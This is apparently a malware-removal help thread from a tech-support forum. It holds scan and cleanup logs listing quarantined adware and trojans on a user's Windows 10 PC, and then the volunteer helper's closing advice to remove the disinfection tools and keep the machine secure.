[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\static.re-markit00.re-markit.co
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www-searching.com
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\smu.exe
[-] Value deleted: HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION [NowUSeeItPlayer.exe]
[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Control\Class\{0C95ABFE-4FB6-49DB-B22F-0E1F5FC4BEEC}
[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Control\Class\{EEEFACB3-729F-4484-B66D-E7A7917BBFC1}
[-] Key deleted: HKLM\SOFTWARE\CLASSES\APPID\56BF5154-0B48-4ADB-902A-6C8B12E270D9
[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\e24b7131-d039-43cb-9e6f-ad4be601ec1f
[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\04262113-2a31-48e1-b4bb-3b42174bea0f
[#] Key deleted on reboot: HKLM\SYSTEM\ControlSet001\Control\Power\User\PowerSchemes\e24b7131-d039-43cb-9e6f-ad4be601ec1f
[#] Key deleted on reboot: HKLM\SYSTEM\ControlSet001\Control\Power\User\PowerSchemes\04262113-2a31-48e1-b4bb-3b42174bea0f
 
 
***** [ Web browsers ] *****
 
 
 
*************************
 
:: "Tracing" keys deleted
:: Winsock settings cleared
 
*************************
 
C:\AdwCleaner\AdwCleaner[C0].txt - [19752 Bytes] - [28/12/2016 13:18:51]
C:\AdwCleaner\AdwCleaner[S0].txt - [19247 Bytes] - [28/12/2016 13:17:29]
 
########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [19900 Bytes] ##########
 
 
 
 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.0 (12.05.2016)
Operating System: Windows 10 Home x64 
Ran by Robert G (Administrator) on Wed 12/28/2016 at 13:23:20.60
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
File System: 3 
 
Successfully deleted: C:\Users\Robert G\AppData\Roaming\new version available (Folder) 
Successfully deleted: C:\WINDOWS\wininit.ini (File) 
Successfully deleted: C:\Users\Robert G\desktop\Continue Last version Installation.lnk (File) 
 
 
 
Registry: 1 
 
Successfully deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\\GoogleChromeAutoLaunch_9868320E49253A0128EE64E2725BFE91 (Registry Value) 
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Wed 12/28/2016 at 13:27:25.76
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 

C:\AdwCleaner\quarantine\files\ggfimkhlvauieuzfsteewtmxldmzxvke\bandwidthstat.exe a variant of Win32/Techsnab.AG potentially unwanted application cleaned by deleting
C:\FRST\Quarantine\C\xpack1221_US.1482324322.exe.xBAD multiple threats cleaned by deleting
C:\FRST\Quarantine\C\Program Files\0DA5GV0SMZ\0DA5GV0SM.exe a variant of MSIL/Adware.CsdiMonetize.E application cleaned by deleting
C:\FRST\Quarantine\C\Program Files\1OZOH9DOKF\8RNAHD98E.exe a variant of MSIL/Adware.CsdiMonetize.E application cleaned by deleting
C:\FRST\Quarantine\C\Program Files\AE5AV44CD6\AE5AV44CD.exe a variant of MSIL/Adware.CsdiMonetize.E application cleaned by deleting
C:\FRST\Quarantine\C\Program Files\Common Files\Noobzo\GNUpdate\smci32.dll a variant of Win32/SpeedBit.AS potentially unwanted application cleaned by deleting
C:\FRST\Quarantine\C\Program Files\Common Files\Noobzo\GNUpdate\smci64.dll a variant of Win64/SBWatchman.A potentially unwanted application cleaned by deleting
C:\FRST\Quarantine\C\Program Files\Common Files\Noobzo\GNUpdate\smi32.exe a variant of Win32/SpeedBit.AU potentially unwanted application cleaned by deleting
C:\FRST\Quarantine\C\Program Files\Common Files\Noobzo\GNUpdate\smu.exe a variant of Win64/SBWatchman.A potentially unwanted application cleaned by deleting
C:\FRST\Quarantine\C\Program Files\Common Files\Noobzo\GNUpdate\SMUninstall.exe a variant of Win32/SBWatchman.K potentially unwanted application cleaned by deleting
C:\FRST\Quarantine\C\Program Files\Common Files\Noobzo\GNUpdate\smw.sys a variant of Win64/SpeedBit.D potentially unwanted application cleaned by deleting
C:\FRST\Quarantine\C\Program Files (x86)\Disenfranchise\fluctuations.exe a variant of MSIL/Adware.Dotdo.AP application cleaned by deleting
C:\FRST\Quarantine\C\Program Files (x86)\E5AD75FC-1482865504-9D97-579A-C454442718AE\kns82E3.tmp a variant of Win32/Adware.ConvertAd.AJI application cleaned by deleting
C:\FRST\Quarantine\C\Program Files (x86)\E5AD75FC-1482865504-9D97-579A-C454442718AE\Uninstall.exe a variant of Win32/Adware.ConvertAd.AJQ.gen application cleaned by deleting
C:\FRST\Quarantine\C\Program Files (x86)\E5AD75FC-1482865504-9D97-579A-C454442718AE\vnso7410.tmp a variant of Win32/Adware.ConvertAd.AJQ.gen application cleaned by deleting
C:\FRST\Quarantine\C\Program Files (x86)\Ovals\fluctuations.exe a variant of MSIL/Adware.Dotdo.AP application cleaned by deleting
C:\FRST\Quarantine\C\Users\Robert G\AppData\Local\fluctuations.exe.xBAD a variant of MSIL/Adware.Dotdo.AP application cleaned by deleting
C:\FRST\Quarantine\C\Users\Robert G\AppData\Local\slisdo.dll.xBAD a variant of Win32/TrojanProxy.Agent.OAL trojan cleaned by deleting
C:\FRST\Quarantine\C\Users\Robert G\AppData\Local\Temp\12C5.tmp.exe.xBAD a variant of Win32/InstallCore.ANV potentially unwanted application cleaned by deleting
C:\FRST\Quarantine\C\Users\Robert G\AppData\Local\Temp\B4E9.tmp.exe.xBAD a variant of Win32/InstallCore.ANV potentially unwanted application cleaned by deleting
C:\FRST\Quarantine\C\Users\Robert G\AppData\Local\Temp\ICReinstall_B4E9.tmp.exe.xBAD a variant of Win32/InstallCore.ANV potentially unwanted application cleaned by deleting
C:\FRST\Quarantine\C\Users\Robert G\AppData\Local\Temp\sdf6733.exe.xBAD a variant of MSIL/Adware.Imali.C application cleaned by deleting
C:\FRST\Quarantine\C\Users\Robert G\AppData\Roaming\Interstatnogui\interstatnogui.exe a variant of Win32/Techsnab.AG potentially unwanted application cleaned by deleting
C:\FRST\Quarantine\C\Users\Robert G\AppData\Roaming\JucdiJhnoz\Aiosoukn.din a variant of Win32/Adware.PennyBee.AH application cleaned by deleting
C:\FRST\Quarantine\C\Users\Robert G\AppData\Roaming\JucdiJhnoz\Rawei.exe a variant of Win32/TrojanDropper.Addrop.AI trojan cleaned by deleting
C:\FRST\Quarantine\C\Users\Robert G\AppData\Roaming\Xeeedxi\Nenlaak.dll a variant of Win32/TrojanDropper.Addrop.AI trojan cleaned by deleting
C:\FRST\Quarantine\C\Users\Robert G\AppData\Roaming\Xeeedxi\Nenlaak.exe a variant of Win32/TrojanDropper.Addrop.AI trojan cleaned by deleting
C:\FRST\Quarantine\C\Users\Robert G\AppData\Roaming\Xeeedxi\Xeeedxi.exe a variant of Win32/Adware.PennyBee.AH application cleaned by deleting
C:\FRST\Quarantine\C\Windows\4b15ad0c9aba0f5f34b9d34c5ca543e0.exe.xBAD a variant of Win32/Packed.NSISmod.AE suspicious application cleaned by deleting
C:\FRST\Quarantine\C\Windows\System32\BITBBD7.tmp.xBAD a variant of Win32/SpeedBit.BE potentially unwanted application cleaned by deleting
C:\FRST\Quarantine\C\Windows\System32\BITDFC5.tmp.xBAD a variant of Win32/SpeedBit.BE potentially unwanted application cleaned by deleting
C:\FRST\Quarantine\C\Windows\System32\drivers\cherimoya.sys.xBAD a variant of Win64/NetFilter.A potentially unsafe application cleaned by deleting
C:\FRST\Quarantine\C\Windows\SysWOW64\SendRequest Error.xBAD multiple threats cleaned by deleting
C:\FRST\Quarantine\C\Windows\Temp\set_xVQSGNGL.exe.xBAD a variant of Win32/DownloadAdmin.W potentially unwanted application cleaned by deleting
C:\Program Files (x86)\Intel\MVckHWN7ffyT\updater.exe MSIL/TrojanDownloader.Adload.BC trojan cleaned by deleting
C:\Users\Robert G\Documents\Downloads\CuteWriter.exe a variant of Win32/Bundled.Toolbar.Ask.D potentially unsafe application deleted
C:\Users\Robert G\Documents\Downloads\media.player.codec.pack.v4.2.3.setup.exe a variant of Win32/Bundled.Toolbar.Ask.G potentially unsafe application deleted
C:\Users\Robert G\Documents\Downloads\TopckitSetup0A.exe a variant of Win32/Adware.Topckit application cleaned by deleting
C:\Windows\Installer\bd885c.msi a variant of Win32/Verti.U potentially unwanted application deleted
 
 
 

 Results of screen317's Security Check version 1.014 --- 12/23/15  
   x64 (UAC is enabled)  
 Internet Explorer 11  
``````````````Antivirus/Firewall Check:`````````````` 
 Windows Firewall Enabled!  
Windows Defender   
 WMI entry may not exist for antivirus; attempting automatic update. 
`````````Anti-malware/Other Utilities Check:````````` 
 Adobe Flash Player 24.0.0.186  
 Google Chrome (55.0.2883.87) 
 Google Chrome (SetupMetrics...) 
````````Process Check: objlist.exe by Laurent````````  
`````````````````System Health check````````````````` 
 Total Fragmentation on Drive C:  % 
````````````````````End of Log`````````````````````` 
 
 


#7 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,971 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:07:48 PM

Posted 29 December 2016 - 09:47 AM

Things are looking great. Do you have any remaining concerns before I provide some closing information?
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#8 billiam864

billiam864
  • Topic Starter

  • Members
  • 71 posts
  • OFFLINE
  •  
  • Local time:10:48 PM

Posted 29 December 2016 - 11:11 AM

No remaining concerns so far. I'll try to continue testing out the computer today.



#9 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,971 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:07:48 PM

Posted 29 December 2016 - 08:21 PM

Very good.

Now that your computer is running well it is my great pleasure to proclaim to you the Good News!

===================================================

All Clean!

--------------

Your machine appears to be clean and we will now remove the tools used and logs created during our steps. Please do this.

===================================================

Delfix by Xplode

--------------------
  • Download Delfix and save it to your Desktop
  • Double click the icon
  • Place checkmarks in:

Remove disinfection tools
Create registry backup
Purge system restore

  • Click Run
===================================================

You may delete any additional programs or logs on your computer which were not automatically removed by Delfix. Simply delete the log files or desktop icons. If we used Emsisoft Emergency Kit just delete the icon on your desktop and the C:\EEK folder.

Please take the time to read below on how to secure the machine and take the necessary steps to keep it clean :thumbsup:

Lawrence Abrams, the founder of BleepingComputer.com, has developed an excellent tutorial which will provide you with the information you need to know to keep your computer secure and clean. Please take the time to read:In addition, here are some more links you might find of interest:Thank you for placing your trust in BleepingComputer. It was a pleasure serving you. OhMy_done.gif
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#10 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,971 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:07:48 PM

Posted 30 December 2016 - 05:21 PM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users